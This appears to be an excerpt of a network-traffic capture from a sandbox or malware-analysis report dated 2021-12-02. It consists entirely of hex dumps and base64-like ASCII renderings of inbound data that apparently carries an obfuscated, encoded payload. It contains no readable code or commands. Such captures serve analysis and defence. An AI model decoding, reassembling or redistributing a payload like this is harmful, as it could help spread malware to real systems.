                                                      2021-12-02 17:26:37 UTC72INData Raw: 6b 55 73 59 45 59 35 4c 47 41 78 4d 79 78 67 52 6b 59 73 59 45 45 35 4c 47 42 43 52 69 78 67 4d 6a 4d 73 59 45 5a 45 4c 47 42 46 4e 79 78 67 52 6b 59 73 59 45 5a 44 4c 47 42 43 51 69 78 67 4f 54 6b 73 59 45 5a 47 4c 47 42 46 51 53 78 67 4d 30 59 73 59 44 51 77 4c 47 42 42 52 69 78 67 52 45 55 73 59 45 49 78 4c 47 41 77 4f 43 78 67 52 6b 59 73 59 44 41 7a 4c 47 41 7a 52 69 78 67 4e 54 55 73 59 45 5a 47 4c 47 42 43 52 43 78 67 4f 55 51 73 59 44 55 33 4c 47 42 47 52 69 78 67 51 6a 63 73 59 44 64 47 4c 47 41 34 4d 43 78 67 4e 55 55 73 59 45 5a 45 4c 47 42 43 52 69 78 67 4d 54 63 73 59 44 56 47 4c 47 42 47 52 43 78 67 51 7a 4d 73 59 45 55 35 4c 47 41 31 52 69 78 67 52 6a 51 73 59 44 6c 43 4c 47 42 47 52 69 78 67 52 6a 4d 73 59 45 55 78 4c 47 42 46 51 53 78 67
                                                      Data Ascii: kUsYEY5LGAxMyxgRkYsYEE5LGBCRixgMjMsYEZELGBFNyxgRkYsYEZDLGBCQixgOTksYEZGLGBFQSxgM0YsYDQwLGBBRixgREUsYEIxLGAwOCxgRkYsYDAzLGAzRixgNTUsYEZGLGBCRCxgOUQsYDU3LGBGRixgQjcsYDdGLGA4MCxgNUUsYEZELGBCRixgMTcsYDVGLGBGRCxgQzMsYEU5LGA1RixgRjQsYDlCLGBGRixgRjMsYEUxLGBFQSxg
                                                      2021-12-02 17:26:37 UTC76INData Raw: 56 47 4c 47 41 32 4f 43 78 67 4f 45 4d 73 59 45 51 35 4c 47 42 47 52 69 78 67 52 6a 55 73 59 44 46 43 4c 47 42 47 52 43 78 67 4e 6a 6b 73 59 44 67 30 4c 47 42 47 4d 79 78 67 4d 30 59 73 59 45 52 45 4c 47 41 33 4f 53 78 67 52 6b 51 73 59 44 52 47 4c 47 42 44 4d 43 78 67 52 55 49 73 59 45 4e 43 4c 47 42 43 52 69 78 67 52 54 55 73 59 44 42 47 4c 47 42 47 4f 53 78 67 4d 6b 51 73 59 45 51 79 4c 47 42 45 52 69 78 67 52 54 6b 73 59 44 56 47 4c 47 42 47 51 53 78 67 4d 44 63 73 59 45 5a 45 4c 47 42 45 4e 43 78 67 52 6b 55 73 59 45 5a 47 4c 47 42 47 4e 53 78 67 4f 55 49 73 59 44 64 44 4c 47 41 77 52 53 78 67 4e 6b 59 73 59 45 4d 35 4c 47 41 31 51 69 78 67 4e 44 63 73 59 45 5a 46 4c 47 41 78 51 79 78 67 4d 54 45 73 59 44 56 42 4c 47 42 46 4e 79 78 67 52 6a 55 73 59
                                                      Data Ascii: VGLGA2OCxgOEMsYEQ5LGBGRixgRjUsYDFCLGBGRCxgNjksYDg0LGBGMyxgM0YsYERELGA3OSxgRkQsYDRGLGBDMCxgRUIsYENCLGBCRixgRTUsYDBGLGBGOSxgMkQsYEQyLGBERixgRTksYDVGLGBGQSxgMDcsYEZELGBENCxgRkUsYEZGLGBGNSxgOUIsYDdDLGAwRSxgNkYsYEM5LGA1QixgNDcsYEZFLGAxQyxgMTEsYDVBLGBFNyxgRjUsY
                                                      2021-12-02 17:26:37 UTC80INData Raw: 45 4d 79 78 67 52 55 49 73 59 45 5a 47 4c 47 41 32 4d 43 78 67 52 54 63 73 59 45 59 31 4c 47 42 45 52 69 78 67 4d 54 41 73 59 45 46 47 4c 47 42 47 52 69 78 67 4d 7a 6b 73 59 45 4e 45 4c 47 41 35 52 69 78 67 52 6a 63 73 59 44 49 33 4c 47 42 42 4e 69 78 67 52 6b 59 73 59 45 4d 33 4c 47 42 43 52 69 78 67 52 6a 55 73 59 45 59 33 4c 47 42 47 52 69 78 67 51 7a 45 73 59 45 4d 78 4c 47 42 46 51 69 78 67 4e 7a 4d 73 59 44 55 34 4c 47 41 78 52 43 78 67 4e 6b 59 73 59 44 41 31 4c 47 41 32 51 69 78 67 4e 45 55 73 59 45 46 47 4c 47 42 47 52 69 78 67 52 55 49 73 59 44 6c 45 4c 47 42 45 4e 79 78 67 52 6b 59 73 59 45 49 35 4c 47 42 43 52 69 78 67 4f 54 55 73 59 44 56 46 4c 47 42 47 52 69 78 67 4f 54 6b 73 59 45 4a 47 4c 47 42 46 4e 43 78 67 4f 54 63 73 59 45 5a 45 4c 47
                                                      Data Ascii: EMyxgRUIsYEZGLGA2MCxgRTcsYEY1LGBERixgMTAsYEFGLGBGRixgMzksYENELGA5RixgRjcsYDI3LGBBNixgRkYsYEM3LGBCRixgRjUsYEY3LGBGRixgQzEsYEMxLGBFQixgNzMsYDU4LGAxRCxgNkYsYDA1LGA2QixgNEUsYEFGLGBGRixgRUIsYDlELGBENyxgRkYsYEI5LGBCRixgOTUsYDVFLGBGRixgOTksYEJGLGBFNCxgOTcsYEZELG
                                                      2021-12-02 17:26:37 UTC84INData Raw: 51 7a 4d 73 59 44 64 47 4c 47 42 47 4d 79 78 67 4d 6b 59 73 59 45 45 79 4c 47 41 79 4d 53 78 67 51 6b 49 73 59 45 49 30 4c 47 42 47 4e 53 78 67 4e 55 59 73 59 44 51 30 4c 47 42 46 51 79 78 67 52 44 67 73 59 44 63 35 4c 47 42 47 4e 53 78 67 52 6a 63 73 59 45 4d 32 4c 47 42 42 51 69 78 67 52 6b 59 73 59 45 59 30 4c 47 42 44 4e 53 78 67 52 55 59 73 59 45 59 32 4c 47 41 33 4e 79 78 67 51 54 63 73 59 44 4e 47 4c 47 42 47 4e 69 78 67 4e 30 59 73 59 45 5a 47 4c 47 41 30 4d 53 78 67 51 54 63 73 59 45 5a 46 4c 47 42 42 51 69 78 67 4e 55 59 73 59 44 45 77 4c 47 41 32 4d 79 78 67 52 6b 4d 73 59 45 55 32 4c 47 41 7a 4e 69 78 67 52 55 59 73 59 45 5a 44 4c 47 41 77 4e 53 78 67 51 55 51 73 59 45 49 33 4c 47 41 33 4e 53 78 67 4e 55 55 73 59 45 5a 45 4c 47 41 35 52 43 78
                                                      Data Ascii: QzMsYDdGLGBGMyxgMkYsYEEyLGAyMSxgQkIsYEI0LGBGNSxgNUYsYDQ0LGBFQyxgRDgsYDc5LGBGNSxgRjcsYEM2LGBBQixgRkYsYEY0LGBDNSxgRUYsYEY2LGA3NyxgQTcsYDNGLGBGNixgN0YsYEZGLGA0MSxgQTcsYEZFLGBBQixgNUYsYDEwLGA2MyxgRkMsYEU2LGAzNixgRUYsYEZDLGAwNSxgQUQsYEI3LGA3NSxgNUUsYEZELGA5RCx
                                                      2021-12-02 17:26:37 UTC89INData Raw: 44 63 77 4c 47 42 43 4d 53 78 67 52 45 49 73 59 44 4a 47 4c 47 41 34 4d 43 78 67 51 6a 63 73 59 45 51 77 4c 47 41 33 4f 53 78 67 52 6b 51 73 59 45 56 47 4c 47 42 46 4e 69 78 67 52 44 63 73 59 45 5a 47 4c 47 42 46 52 69 78 67 52 6b 59 73 59 45 55 35 4c 47 41 7a 52 69 78 67 4e 45 4d 73 59 44 64 47 4c 47 41 35 51 69 78 67 51 6a 4d 73 59 45 4a 47 4c 47 42 46 4d 79 78 67 51 6b 59 73 59 45 59 32 4c 47 41 7a 51 69 78 67 52 6b 55 73 59 45 59 78 4c 47 42 45 52 69 78 67 52 6b 4d 73 59 44 4d 33 4c 47 41 33 4d 53 78 67 4e 54 49 73 59 45 59 30 4c 47 42 46 4d 79 78 67 51 54 51 73 59 44 6c 45 4c 47 41 7a 51 69 78 67 4e 6b 59 73 59 45 5a 46 4c 47 41 34 4d 53 78 67 4e 7a 67 73 59 45 59 7a 4c 47 41 31 52 69 78 67 52 6b 4d 73 59 45 4e 45 4c 47 42 47 52 53 78 67 52 6a 67 73
                                                      Data Ascii: DcwLGBCMSxgREIsYDJGLGA4MCxgQjcsYEQwLGA3OSxgRkQsYEVGLGBFNixgRDcsYEZGLGBFRixgRkYsYEU5LGAzRixgNEMsYDdGLGA5QixgQjMsYEJGLGBFMyxgQkYsYEY2LGAzQixgRkUsYEYxLGBERixgRkMsYDM3LGA3MSxgNTIsYEY0LGBFMyxgQTQsYDlELGAzQixgNkYsYEZFLGA4MSxgNzgsYEYzLGA1RixgRkMsYENELGBGRSxgRjgs
                                                      2021-12-02 17:26:37 UTC93INData Raw: 41 77 4e 79 78 67 52 44 63 73 59 45 5a 47 4c 47 42 45 51 69 78 67 4e 44 45 73 59 45 5a 42 4c 47 42 46 4f 43 78 67 51 7a 63 73 59 45 5a 47 4c 47 42 47 51 53 78 67 4f 54 45 73 59 45 5a 47 4c 47 42 46 51 53 78 67 51 6b 59 73 59 44 52 45 4c 47 41 78 4e 43 78 67 4e 30 55 73 59 44 5a 42 4c 47 41 31 51 79 78 67 4f 44 45 73 59 45 52 47 4c 47 42 47 51 79 78 67 52 45 59 73 59 45 45 32 4c 47 41 30 4e 43 78 67 4e 55 49 73 59 45 55 33 4c 47 42 45 4e 53 78 67 4e 30 59 73 59 45 5a 46 4c 47 41 79 52 69 78 67 51 54 45 73 59 44 55 33 4c 47 42 45 52 69 78 67 4d 30 4d 73 59 45 59 35 4c 47 42 42 4e 79 78 67 4e 30 55 73 59 44 6b 7a 4c 47 42 43 4e 43 78 67 4d 6b 51 73 59 45 5a 46 4c 47 42 46 4d 43 78 67 4d 30 59 73 59 45 52 42 4c 47 41 33 52 69 78 67 52 6a 55 73 59 44 46 47 4c
                                                      Data Ascii: AwNyxgRDcsYEZGLGBEQixgNDEsYEZBLGBFOCxgQzcsYEZGLGBGQSxgOTEsYEZGLGBFQSxgQkYsYDRELGAxNCxgN0UsYDZBLGA1QyxgODEsYERGLGBGQyxgREYsYEE2LGA0NCxgNUIsYEU3LGBENSxgN0YsYEZFLGAyRixgQTEsYDU3LGBERixgM0MsYEY5LGBBNyxgN0UsYDkzLGBCNCxgMkQsYEZFLGBFMCxgM0YsYERBLGA3RixgRjUsYDFGL
                                                      2021-12-02 17:26:37 UTC96INData Raw: 46 4c 47 42 47 52 53 78 67 4f 44 63 73 59 45 59 78 4c 47 42 47 4e 69 78 67 4e 55 59 73 59 45 59 34 4c 47 41 33 51 69 78 67 4d 30 59 73 59 45 5a 43 4c 47 42 46 52 69 78 67 52 44 4d 73 59 44 56 47 4c 47 42 47 4f 43 78 67 4f 55 51 73 59 44 4e 47 4c 47 41 7a 4d 69 78 67 4e 45 4d 73 59 44 49 31 4c 47 42 45 51 79 78 67 4d 44 63 73 59 45 4d 31 4c 47 42 43 52 53 78 67 4e 7a 51 73 59 44 55 35 4c 47 42 44 4e 53 78 67 52 6b 49 73 59 45 59 30 4c 47 42 47 51 53 78 67 4d 55 59 73 59 45 52 42 4c 47 41 33 4f 53 78 67 52 6b 51 73 59 44 42 47 4c 47 42 44 4d 53 78 67 52 55 49 73 59 45 5a 47 4c 47 42 47 4f 53 78 67 4e 55 59 73 59 44 4d 32 4c 47 42 47 52 43 78 67 52 45 49 73 59 45 51 79 4c 47 41 33 52 69 78 67 52 54 41 73 59 44 4d 33 4c 47 42 47 51 79 78 67 4d 44 4d 73 59 45
                                                      Data Ascii: FLGBGRSxgODcsYEYxLGBGNixgNUYsYEY4LGA3QixgM0YsYEZCLGBFRixgRDMsYDVGLGBGOCxgOUQsYDNGLGAzMixgNEMsYDI1LGBEQyxgMDcsYEM1LGBCRSxgNzQsYDU5LGBDNSxgRkIsYEY0LGBGQSxgMUYsYERBLGA3OSxgRkQsYDBGLGBDMSxgRUIsYEZGLGBGOSxgNUYsYDM2LGBGRCxgREIsYEQyLGA3RixgRTAsYDM3LGBGQyxgMDMsYE
                                                      2021-12-02 17:26:37 UTC100INData Raw: 4d 69 78 67 51 30 55 73 59 45 46 43 4c 47 42 43 52 69 78 67 4d 44 4d 73 59 44 56 46 4c 47 42 47 52 43 78 67 4d 30 51 73 59 45 5a 47 4c 47 42 44 4d 43 78 67 52 6b 59 73 59 45 5a 46 4c 47 41 33 52 69 78 67 4e 44 67 73 59 45 5a 47 4c 47 42 46 52 53 78 67 51 6b 59 73 59 45 59 32 4c 47 41 33 52 69 78 67 52 6a 67 73 59 44 67 31 4c 47 41 77 4d 53 78 67 52 44 49 73 59 44 5a 43 4c 47 41 77 4f 43 78 67 51 7a 51 73 59 45 56 47 4c 47 42 46 52 53 78 67 52 44 59 73 59 45 4e 43 4c 47 42 45 4e 69 78 67 4f 44 51 73 59 45 59 30 4c 47 41 35 52 69 78 67 52 45 45 73 59 44 63 35 4c 47 42 47 52 43 78 67 52 45 59 73 59 45 5a 45 4c 47 42 43 4d 79 78 67 52 54 67 73 59 45 59 31 4c 47 41 7a 52 69 78 67 4d 6a 55 73 59 45 59 35 4c 47 42 46 4e 53 78 67 52 6b 59 73 59 44 51 7a 4c 47 42
                                                      Data Ascii: MixgQ0UsYEFCLGBCRixgMDMsYDVFLGBGRCxgM0QsYEZGLGBDMCxgRkYsYEZFLGA3RixgNDgsYEZGLGBFRSxgQkYsYEY2LGA3RixgRjgsYDg1LGAwMSxgRDIsYDZCLGAwOCxgQzQsYEVGLGBFRSxgRDYsYENCLGBENixgODQsYEY0LGA5RixgREEsYDc5LGBGRCxgREYsYEZELGBCMyxgRTgsYEY1LGAzRixgMjUsYEY5LGBFNSxgRkYsYDQzLGB
                                                      2021-12-02 17:26:37 UTC104INData Raw: 6b 59 73 59 45 59 31 4c 47 41 7a 51 69 78 67 52 6b 55 73 59 44 6c 43 4c 47 41 32 4f 53 78 67 51 6a 67 73 59 45 4a 47 4c 47 41 35 4d 79 78 67 4d 55 51 73 59 45 56 46 4c 47 42 45 52 69 78 67 52 6b 4d 73 59 44 55 7a 4c 47 42 47 4e 53 78 67 4f 55 59 73 59 45 51 34 4c 47 41 33 4f 53 78 67 4e 7a 55 73 59 44 68 45 4c 47 41 31 4e 79 78 67 4e 30 59 73 59 44 6c 47 4c 47 41 7a 52 69 78 67 4e 7a 6b 73 59 45 5a 44 4c 47 41 79 4e 43 78 67 52 6b 51 73 59 44 42 45 4c 47 41 33 52 69 78 67 52 44 63 73 59 45 46 47 4c 47 41 33 52 53 78 67 52 44 63 73 59 45 45 77 4c 47 42 46 4d 79 78 67 4d 30 51 73 59 44 52 44 4c 47 42 43 4d 43 78 67 52 44 55 73 59 44 41 78 4c 47 42 47 52 69 78 67 52 44 63 73 59 44 5a 47 4c 47 42 43 4e 43 78 67 4e 44 63 73 59 44 4e 45 4c 47 42 47 52 69 78 67
                                                      Data Ascii: kYsYEY1LGAzQixgRkUsYDlCLGA2OSxgQjgsYEJGLGA5MyxgMUQsYEVFLGBERixgRkMsYDUzLGBGNSxgOUYsYEQ4LGA3OSxgNzUsYDhELGA1NyxgN0YsYDlGLGAzRixgNzksYEZDLGAyNCxgRkQsYDBELGA3RixgRDcsYEFGLGA3RSxgRDcsYEEwLGBFMyxgM0QsYDRDLGBCMCxgRDUsYDAxLGBGRixgRDcsYDZGLGBCNCxgNDcsYDNELGBGRixg
                                                      2021-12-02 17:26:37 UTC108INData Raw: 56 47 4c 47 42 47 4e 79 78 67 52 44 63 73 59 45 52 46 4c 47 42 47 51 53 78 67 4d 45 49 73 59 45 45 35 4c 47 42 46 4d 79 78 67 51 55 51 73 59 45 4a 47 4c 47 41 34 4e 43 78 67 52 6b 55 73 59 45 59 35 4c 47 41 79 52 43 78 67 51 6a 6b 73 59 45 5a 47 4c 47 41 33 52 69 78 67 4f 54 55 73 59 45 5a 42 4c 47 42 47 52 69 78 67 52 6a 55 73 59 45 49 33 4c 47 42 44 4d 79 78 67 52 6b 55 73 59 45 56 47 4c 47 41 77 4d 53 78 67 52 45 45 73 59 45 4d 7a 4c 47 42 45 52 69 78 67 52 6b 49 73 59 45 52 47 4c 47 41 7a 4f 43 78 67 4e 45 59 73 59 44 64 47 4c 47 42 47 4d 53 78 67 4e 55 59 73 59 45 4a 46 4c 47 42 47 4e 79 78 67 4e 6b 49 73 59 44 41 33 4c 47 42 45 4d 43 78 67 52 6b 55 73 59 45 56 45 4c 47 41 31 52 69 78 67 52 6a 4d 73 59 44 4d 33 4c 47 42 47 52 69 78 67 4e 7a 55 73 59
                                                      Data Ascii: VGLGBGNyxgRDcsYERFLGBGQSxgMEIsYEE5LGBFMyxgQUQsYEJGLGA4NCxgRkUsYEY5LGAyRCxgQjksYEZGLGA3RixgOTUsYEZBLGBGRixgRjUsYEI3LGBDMyxgRkUsYEVGLGAwMSxgREEsYEMzLGBERixgRkIsYERGLGAzOCxgNEYsYDdGLGBGMSxgNUYsYEJFLGBGNyxgNkIsYDA3LGBEMCxgRkUsYEVELGA1RixgRjMsYDM3LGBGRixgNzUsY
                                                      2021-12-02 17:26:37 UTC112INData Raw: 35 52 43 78 67 52 6b 59 73 59 44 4a 42 4c 47 41 33 51 79 78 67 51 6a 67 73 59 45 56 45 4c 47 42 45 4f 43 78 67 52 6b 49 73 59 44 45 33 4c 47 42 46 4d 79 78 67 52 55 59 73 59 45 4a 47 4c 47 41 78 4d 69 78 67 52 6b 59 73 59 44 68 44 4c 47 42 45 52 43 78 67 4f 44 63 73 59 44 4e 47 4c 47 42 44 4d 43 78 67 52 45 59 73 59 44 64 47 4c 47 41 77 4d 43 78 67 4d 44 59 73 59 45 5a 43 4c 47 42 46 51 69 78 67 4d 45 59 73 59 45 59 7a 4c 47 41 7a 51 79 78 67 51 7a 6b 73 59 45 56 45 4c 47 42 42 52 69 78 67 4f 54 63 73 59 44 41 77 4c 47 42 43 4d 79 78 67 4e 30 59 73 59 44 67 32 4c 47 41 7a 4d 43 78 67 52 6b 49 73 59 45 4a 44 4c 47 41 34 4d 79 78 67 52 44 6b 73 59 44 52 47 4c 47 41 78 4d 43 78 67 4e 6a 59 73 59 45 4a 47 4c 47 42 47 4f 53 78 67 51 55 59 73 59 45 59 7a 4c 47
                                                      Data Ascii: 5RCxgRkYsYDJBLGA3QyxgQjgsYEVELGBEOCxgRkIsYDE3LGBFMyxgRUYsYEJGLGAxMixgRkYsYDhDLGBERCxgODcsYDNGLGBDMCxgREYsYDdGLGAwMCxgMDYsYEZCLGBFQixgMEYsYEYzLGAzQyxgQzksYEVELGBBRixgOTcsYDAwLGBCMyxgN0YsYDg2LGAzMCxgRkIsYEJDLGA4MyxgRDksYDRGLGAxMCxgNjYsYEJGLGBGOSxgQUYsYEYzLG
                                                      2021-12-02 17:26:37 UTC116INData Raw: 4e 30 59 73 59 45 51 30 4c 47 42 46 4d 79 78 67 52 54 55 73 59 44 5a 47 4c 47 42 47 4f 53 78 67 4d 55 49 73 59 45 45 31 4c 47 41 77 52 69 78 67 52 6b 55 73 59 45 5a 46 4c 47 42 45 52 69 78 67 51 6a 4d 73 59 44 52 44 4c 47 41 78 52 69 78 67 52 6b 55 73 59 45 49 7a 4c 47 41 33 52 69 78 67 52 54 63 73 59 45 52 47 4c 47 42 47 52 53 78 67 4e 54 4d 73 59 45 55 35 4c 47 42 46 4e 79 78 67 52 6b 59 73 59 45 52 42 4c 47 41 35 52 69 78 67 51 6a 41 73 59 44 4d 34 4c 47 41 7a 52 69 78 67 4e 45 59 73 59 44 64 47 4c 47 41 34 52 43 78 67 52 6a 51 73 59 45 52 47 4c 47 42 47 52 43 78 67 4f 45 51 73 59 45 51 79 4c 47 41 33 52 69 78 67 52 54 63 73 59 44 52 47 4c 47 42 47 51 69 78 67 4e 6a 63 73 59 45 46 47 4c 47 42 43 4d 79 78 67 52 6a 51 73 59 45 52 47 4c 47 42 47 52 69 78
                                                      Data Ascii: N0YsYEQ0LGBFMyxgRTUsYDZGLGBGOSxgMUIsYEE1LGAwRixgRkUsYEZFLGBERixgQjMsYDRDLGAxRixgRkUsYEIzLGA3RixgRTcsYERGLGBGRSxgNTMsYEU5LGBFNyxgRkYsYERBLGA5RixgQjAsYDM4LGAzRixgNEYsYDdGLGA4RCxgRjQsYERGLGBGRCxgOEQsYEQyLGA3RixgRTcsYDRGLGBGQixgNjcsYEFGLGBCMyxgRjQsYERGLGBGRix
                                                      2021-12-02 17:26:37 UTC121INData Raw: 45 5a 46 4c 47 42 46 4e 43 78 67 4e 55 59 73 59 44 68 46 4c 47 42 44 52 69 78 67 4f 55 55 73 59 44 41 31 4c 47 41 35 52 69 78 67 51 7a 45 73 59 44 6c 47 4c 47 42 47 51 79 78 67 4e 30 49 73 59 45 4d 34 4c 47 41 33 52 69 78 67 51 55 59 73 59 45 5a 47 4c 47 42 45 52 53 78 67 51 6a 41 73 59 45 55 7a 4c 47 42 45 52 69 78 67 4d 30 55 73 59 45 5a 45 4c 47 41 78 52 43 78 67 4f 55 55 73 59 45 5a 47 4c 47 42 42 4e 69 78 67 4e 30 59 73 59 44 67 79 4c 47 41 33 4e 43 78 67 52 6b 4d 73 59 44 4e 43 4c 47 41 31 4d 43 78 67 51 7a 63 73 59 45 4a 47 4c 47 42 47 52 43 78 67 4e 45 59 73 59 45 5a 45 4c 47 42 46 4e 69 78 67 51 6b 59 73 59 44 41 7a 4c 47 42 46 4e 53 78 67 4e 7a 59 73 59 45 55 78 4c 47 42 46 4f 53 78 67 52 6b 59 73 59 45 51 31 4c 47 41 31 4e 79 78 67 51 30 49 73
                                                      Data Ascii: EZFLGBFNCxgNUYsYDhFLGBDRixgOUUsYDA1LGA5RixgQzEsYDlGLGBGQyxgN0IsYEM4LGA3RixgQUYsYEZGLGBERSxgQjAsYEUzLGBERixgM0UsYEZELGAxRCxgOUUsYEZGLGBBNixgN0YsYDgyLGA3NCxgRkMsYDNCLGA1MCxgQzcsYEJGLGBGRCxgNEYsYEZELGBFNixgQkYsYDAzLGBFNSxgNzYsYEUxLGBFOSxgRkYsYEQ1LGA1NyxgQ0Is
                                                      2021-12-02 17:26:37 UTC125INData Raw: 42 47 51 53 78 67 4d 44 63 73 59 45 56 45 4c 47 42 43 4d 79 78 67 52 6a 51 73 59 45 56 47 4c 47 42 47 51 69 78 67 52 54 4d 73 59 44 64 47 4c 47 42 47 4e 53 78 67 4d 30 59 73 59 45 59 31 4c 47 41 33 51 69 78 67 52 6b 59 73 59 44 55 30 4c 47 41 31 51 53 78 67 52 6b 51 73 59 44 5a 45 4c 47 42 42 4e 79 78 67 4e 6a 55 73 59 44 64 42 4c 47 42 47 52 53 78 67 52 55 55 73 59 45 59 33 4c 47 41 7a 51 53 78 67 52 6a 67 73 59 44 64 45 4c 47 42 45 4d 69 78 67 52 6a 59 73 59 45 4e 46 4c 47 42 45 52 69 78 67 52 6b 49 73 59 45 52 43 4c 47 42 42 4e 69 78 67 51 6b 59 73 59 45 4e 43 4c 47 42 43 4d 79 78 67 52 6b 59 73 59 45 5a 43 4c 47 41 7a 4e 79 78 67 52 6b 4d 73 59 45 45 35 4c 47 42 45 52 69 78 67 4f 55 49 73 59 44 63 34 4c 47 41 79 52 69 78 67 4e 45 59 73 59 45 5a 47 4c
                                                      Data Ascii: BGQSxgMDcsYEVELGBCMyxgRjQsYEVGLGBGQixgRTMsYDdGLGBGNSxgM0YsYEY1LGA3QixgRkYsYDU0LGA1QSxgRkQsYDZELGBBNyxgNjUsYDdBLGBGRSxgRUUsYEY3LGAzQSxgRjgsYDdELGBEMixgRjYsYENFLGBERixgRkIsYERCLGBBNixgQkYsYENCLGBCMyxgRkYsYEZCLGAzNyxgRkMsYEE5LGBERixgOUIsYDc4LGAyRixgNEYsYEZGL
                                                      2021-12-02 17:26:37 UTC128INData Raw: 31 4c 47 42 47 4e 43 78 67 4e 6a 4d 73 59 44 4d 30 4c 47 42 42 4e 69 78 67 4e 55 59 73 59 45 4d 77 4c 47 41 77 4f 53 78 67 52 44 49 73 59 45 52 47 4c 47 41 7a 4d 43 78 67 52 6b 51 73 59 44 4d 33 4c 47 42 47 52 69 78 67 51 6a 49 73 59 44 4a 47 4c 47 41 31 52 69 78 67 52 6b 59 73 59 45 4d 32 4c 47 41 7a 52 69 78 67 4e 7a 59 73 59 44 6c 46 4c 47 42 47 52 53 78 67 4e 44 6b 73 59 45 4a 47 4c 47 42 46 51 53 78 67 51 30 59 73 59 45 5a 43 4c 47 42 44 52 43 78 67 4f 44 6b 73 59 44 4a 43 4c 47 41 7a 52 53 78 67 52 6b 45 73 59 44 4a 45 4c 47 42 43 52 53 78 67 52 6a 55 73 59 44 45 33 4c 47 42 47 52 69 78 67 4d 30 55 73 59 45 55 35 4c 47 42 46 52 69 78 67 52 6a 45 73 59 45 51 35 4c 47 41 33 52 69 78 67 4f 54 51 73 59 44 6b 7a 4c 47 41 30 4e 69 78 67 4d 30 45 73 59 45
                                                      Data Ascii: 1LGBGNCxgNjMsYDM0LGBBNixgNUYsYEMwLGAwOSxgRDIsYERGLGAzMCxgRkQsYDM3LGBGRixgQjIsYDJGLGA1RixgRkYsYEM2LGAzRixgNzYsYDlFLGBGRSxgNDksYEJGLGBFQSxgQ0YsYEZCLGBDRCxgODksYDJCLGAzRSxgRkEsYDJELGBCRSxgRjUsYDE3LGBGRixgM0UsYEU5LGBFRixgRjEsYEQ5LGA3RixgOTQsYDkzLGA0NixgM0EsYE
                                                      2021-12-02 17:26:37 UTC132INData Raw: 52 69 78 67 4d 6a 6b 73 59 45 52 46 4c 47 42 47 51 69 78 67 51 7a 6b 73 59 45 52 47 4c 47 42 47 4e 53 78 67 4d 55 59 73 59 45 5a 45 4c 47 41 33 4e 79 78 67 52 44 4d 73 59 45 5a 44 4c 47 41 79 52 69 78 67 52 6b 59 73 59 44 51 31 4c 47 41 7a 52 69 78 67 52 55 51 73 59 45 4a 47 4c 47 42 47 4e 79 78 67 52 45 49 73 59 45 59 35 4c 47 41 33 4f 43 78 67 52 6b 59 73 59 44 52 46 4c 47 41 33 52 69 78 67 51 30 55 73 59 45 51 32 4c 47 42 42 52 69 78 67 4d 45 49 73 59 45 4a 44 4c 47 41 33 52 69 78 67 4d 30 51 73 59 45 4d 32 4c 47 41 35 51 69 78 67 4d 6a 49 73 59 45 45 30 4c 47 42 45 52 43 78 67 4d 45 55 73 59 44 6c 44 4c 47 41 33 52 69 78 67 4d 54 49 73 59 44 6b 35 4c 47 42 46 51 53 78 67 51 6b 59 73 59 45 55 79 4c 47 42 45 4e 79 78 67 52 6b 51 73 59 44 4a 45 4c 47 42
                                                      Data Ascii: RixgMjksYERFLGBGQixgQzksYERGLGBGNSxgMUYsYEZELGA3NyxgRDMsYEZDLGAyRixgRkYsYDQ1LGAzRixgRUQsYEJGLGBGNyxgREIsYEY5LGA3OCxgRkYsYDRFLGA3RixgQ0UsYEQ2LGBBRixgMEIsYEJDLGA3RixgM0QsYEM2LGA5QixgMjIsYEE0LGBERCxgMEUsYDlDLGA3RixgMTIsYDk5LGBFQSxgQkYsYEUyLGBENyxgRkQsYDJELGB
                                                      2021-12-02 17:26:37 UTC136INData Raw: 6b 59 73 59 45 56 46 4c 47 42 43 52 69 78 67 52 6a 63 73 59 45 59 33 4c 47 42 47 4f 53 78 67 51 6b 51 73 59 45 4e 47 4c 47 42 45 4d 79 78 67 4e 30 59 73 59 45 56 45 4c 47 42 47 4e 79 78 67 52 6a 67 73 59 45 55 7a 4c 47 42 47 52 69 78 67 4f 54 49 73 59 45 59 30 4c 47 42 47 4e 79 78 67 52 6b 45 73 59 44 52 47 4c 47 42 47 52 53 78 67 4f 45 4d 73 59 44 64 47 4c 47 42 47 4f 43 78 67 51 54 63 73 59 45 4e 46 4c 47 42 44 52 69 78 67 4e 30 59 73 59 45 56 47 4c 47 42 47 4e 43 78 67 52 6a 63 73 59 45 5a 46 4c 47 41 79 4e 79 78 67 4d 30 55 73 59 45 5a 46 4c 47 42 42 4d 79 78 67 52 44 49 73 59 45 4d 35 4c 47 42 45 52 69 78 67 52 6a 67 73 59 44 46 43 4c 47 41 34 51 79 78 67 4e 30 59 73 59 44 6c 47 4c 47 42 47 4d 79 78 67 52 6a 51 73 59 44 68 47 4c 47 42 47 51 79 78 67
                                                      Data Ascii: kYsYEVFLGBCRixgRjcsYEY3LGBGOSxgQkQsYENGLGBEMyxgN0YsYEVELGBGNyxgRjgsYEUzLGBGRixgOTIsYEY0LGBGNyxgRkEsYDRGLGBGRSxgOEMsYDdGLGBGOCxgQTcsYENFLGBDRixgN0YsYEVGLGBGNCxgRjcsYEZFLGAyNyxgM0UsYEZFLGBBMyxgRDIsYEM5LGBERixgRjgsYDFCLGA4QyxgN0YsYDlGLGBGMyxgRjQsYDhGLGBGQyxg
                                                      2021-12-02 17:26:37 UTC140INData Raw: 63 7a 4c 47 42 46 51 53 78 67 52 6b 55 73 59 44 52 47 4c 47 42 42 4e 69 78 67 52 45 59 73 59 44 56 43 4c 47 42 47 51 53 78 67 52 6b 59 73 59 44 4e 47 4c 47 41 30 4e 69 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 33 51 69 78 67 52 54 6b 73 59 45 4a 43 4c 47 42 45 52 69 78 67 4f 45 51 73 59 45 5a 46 4c 47 42 47 52 69 78 67 4e 54 63 73 59 45 5a 44 4c 47 41 31 51 53 78 67 4d 6a 49 73 59 45 4a 42 4c 47 42 43 52 69 78 67 4d 7a 45 73 59 44 64 45 4c 47 41 33 4e 69 78 67 52 6a 41 73 59 44 63 33 4c 47 42 45 4d 43 78 67 4d 55 59 73 59 45 55 35 4c 47 41 32 4e 79 78 67 52 45 59 73 59 45 5a 45 4c 47 42 46 51 69 78 67 52 6b 55 73 59 44 68 45 4c 47 42 47 4e 43 78 67 4e 30 59 73 59 45 5a 44 4c 47 41 30 4e 79 78 67 52 6b 55 73 59 45 5a 43 4c 47 42 46 52 69 78 67 52 6a 67 73 59
